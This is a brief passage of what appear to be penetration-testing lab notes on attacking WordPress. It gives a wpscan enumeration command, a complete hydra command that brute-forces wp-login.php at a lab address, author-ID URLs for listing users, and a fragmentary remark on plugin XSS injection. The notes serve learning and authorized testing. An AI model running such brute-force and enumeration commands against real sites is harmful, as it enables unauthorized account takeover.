• WordPress

    Enumeration Github wpscan --url $target Maybe an API token could be use­ful — then, the Word­Press Vul­ner­a­bil­i­ty Data­base is used. Login brute force hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Check users: http://spectra.htb/main/?author=1 http://spectra.htb/main/?author=2 … Most beautiful wordpress plugin XSS injection If there is a way to inject code some­where (e.g. via a plu­g­in)…